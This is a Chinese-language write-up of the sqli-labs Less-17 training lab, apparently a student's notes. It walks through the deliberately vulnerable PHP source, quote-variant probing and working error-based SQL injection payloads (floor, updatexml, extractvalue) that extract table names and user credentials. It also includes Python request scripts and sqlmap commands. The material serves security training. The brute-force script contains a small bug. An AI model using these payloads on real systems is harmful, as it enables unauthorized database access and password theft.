sqli-lab-less17
一、靶标地址
Less-17 POST-Update Query-Error Based-String
#字符型更新查询报错注入
http://127.0.0.1/sqli/less-17/
二、漏洞探测
猜测业务流程,判断用户名存不存在。存在则更新password,不存在则报错
输入admin admin
得到post数据包
uname=admin&passwd=admin&submit=Submit
#图片回显更新成功
#盲测时我们是不知道admin/admin的
后续使用其他用户名
#图片回显Bug off you Silly Dumb hacker
在进行多次尝试后暂时无思路
三、源码分析
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0); #关闭错误报告
function check_input($value)
{
if(!empty($value))
{
// truncation (see comments)
$value = substr($value,0,15);#从0的位置截取15个字符
}
// Stripslashes if magic quotes enabled
//去除转义反斜杠
if (get_magic_quotes_gpc())
#取得php环境变数 magic_quotes_gpc的值。
#当magic_quotes_gpc打开时,所有的 ‘ (单引号), ” (双引号), (反斜线) and 空字符会自动转为含有反斜线的溢出字符。
{
$value = stripslashes($value);
#stripslashes()函数删除由 addslashes() 函数添加的反斜杠。
}
// Quote if not a number
//加转义反斜杠
if (!ctype_digit($value))
#ctype_digit来检测一个字符串中所以的字符是否都为纯数字
{
$value = "'" . mysql_real_escape_string($value) . "'";
#mysql_real_escape_string转义字符串中的特殊字符
}
else
{
$value = intval($value);
#intval()函数用于获取变量的整数值。
}
return $value;
}
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
//making sure uname is not injectable
$uname=check_input($_POST['uname']);
#uname所有的特殊符号将会转义,无法进行注入
$passwd=$_POST['passwd'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'User Name:'.$uname."\n");
fwrite($fp,'New Password:'.$passwd."\n");
fclose($fp);
// connectivity
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
#只查询uname
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
//echo $row;
if($row)
{
//echo '<font color= "#0000ff">';
$row1 = $row['username'];
//echo 'Your Login name:'. $row1;
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
mysql_query($update);//更新口令
echo "<br>";
if (mysql_error())#执行update语句报出的错误
{
echo '<font color= "#FFFF00" font size = 3 >';
print_r(mysql_error());//打印错误
echo "</br></br>";
echo "</font>";
}
else
{
echo '<font color= "#FFFF00" font size = 3 >';
//echo " You password has been successfully updated " ;
echo "<br>";
echo "</font>";
}
echo '<img src="../images/flag1.jpg" />';
//echo 'Your Password:' .$row['password'];
echo "</font>";
}
else #如果查询不出来直接bug off
{
echo '<font size="4.5" color="#FFFF00">';
//echo "Bug off you Silly Dumb hacker";
echo "</br>";
echo '<img src="../images/slap1.jpg" />';
echo "</font>";
}
}
?>
根据源码分析的流程图重新梳理fuzz思路
一是会使用select语句查询uname存不存在
二是会使用update语句更新passwd
一是注入uname参数
用户名存在不存在会有回显差异,可尝试布尔盲注
然后也可以尝试时间盲注
二是注入passwd参数
发现update语句报错会显示错误
可尝试bool盲注和报错函数回显
这里我们使用报错函数回显,但是前提是我们爆破出一个合法用户名
四、黑盒与白盒测试
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
uname=admin&passwd=1'&submit=Submit
#You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'admin'' at line 1
#admin'
uname=admin&passwd=1"&submit=Submit
#flag
uname=admin&passwd=1')&submit=Submit
#You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')' WHERE username='admin'' at line 1
# )' WHERE username='admin'
uname=admin&passwd=1")&submit=Submit
#flag
uname=admin&passwd=1'))&submit=Submit
#You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '))' WHERE username='admin'' at line 1
# ))' WHERE username='admin'
uname=admin&passwd=1"))&submit=Submit
#flag
#推荐使用脚本探测
#猜测语句为update users set password = '$passwd' WHERE username='$row1';
1、floor()函数报错
#获取数据库 用户 版本号
uname=admin&passwd=1' and (select 1 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a)limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) #&submit=Submit
#因为update语句无法使用union select,所以用and并将后面()
#获取表名
uname=admin&passwd=1' and (select 1,2,3 from (select count(*),concat((select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) #&submit=Submit
#获取列名
uname=admin&passwd=1' and (select 1,2,3 from (select count(*),concat((select concat(column_name,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a) #&submit=Submit
#获取用户名
uname=admin&passwd=1' and (select 1,2,3 from (select count(*),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a) from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a) #&submit=Submit
2、updatexml()函数报错
#获取数据库名
uname=admin&passwd=1' and updatexml(1,concat('~',database(),'~',user(),'~',version()),1) #&submit=Submit
#获取表名
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),0) #&submit=Submit
#获取列名
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')),0) #&submit=Submit
#获取列字段
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select username from security.users limit 0,1),0x7e),0) #&submit=Submit
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select password from security.users limit 0,1),0x7e),0) #&submit=Submit
3、extractvalue()函数报错
uname=1') union &passwd=1&submit=Submit
#获取当期数据库名
uname=admin&passwd=1' and extractvalue(1,concat(0x7e,(select database()))) #&submit=Submit
#获取表名
uname=admin&passwd=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) #&submit=Submit
#获取列名
uname=admin&passwd=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))) #&submit=Submit
#获取列字段
uname=admin&passwd=1' and extractvalue(1,concat(0x7e,(select username from security.users limit 0,1),0x7e)) #&submit=Submit
uname=admin&passwd=1') and extractvalue(1,concat(0x7e,(select password from security.users limit 0,1),0x7e)) #&submit=Submit
五、脚本撰写
#爆破合法用户名
import requests
url="http://192.168.128.159/sqli/less-17/index.php"
#F12查看或者burpsuite抓包
header={
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36','Accept-Language': 'en-US,en;q=0.9',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'
}
file = open("./username.txt","r")
usernames = file.read().splitlines()
target_str = "flag"
for i in range(len(usernames)):
payload = {
"uname" : i,
"passwd" : "1"
}
response=requests.post(url,headers=header,data=payload)
if target_str in response.text:
print(response.text)
#进行注入
import requests
url="http://192.168.128.159/sqli/less-17/index.php"
#F12查看或者burpsuite抓包
header={
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36',
'Accept-Language': 'en-US,en;q=0.9',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'
}
payload = {
"uname" : "admin",
"passwd" : "1' and updatexml(1,concat('~',database(),'~',user(),'~',version()),1) #"
}
response=requests.post(url,headers=header,data=payload)
print(response.text)
六、sqlmap
sqlmap -u "http://192.168.128.159/sqli/Less-17/" --data "uname=1&passwd=1&submit=Submit" -p passwd --batch
#探测无结果
sqlmap -r target.txt -p passwd --batch
Parameter: passwd (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: uname=admin&passwd=admin' AND (SELECT 4789 FROM(SELECT COUNT(*),CONCAT(0x71627a6b71,(SELECT (ELT(4789=4789,1))),0x717a7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Xiak&submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=admin&passwd=admin' AND (SELECT 7414 FROM (SELECT(SLEEP(5)))qEWO)-- YjGd&submit=Submit
POST /sqli/less-17/ HTTP/1.1
Host: 192.168.128.159
Content-Length: 38
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.128.159
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.128.159/sqli/less-17/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
uname=admin&passwd=admin&submit=Submit
七、总结
1、当第一个参数无法注入时,就需要考虑第二个参数
2、尝试不同的方法
联合查询
报错函数回显
时间盲注
布尔盲注
3、sqlmap的不同使用方式
sqlmap -r target.txt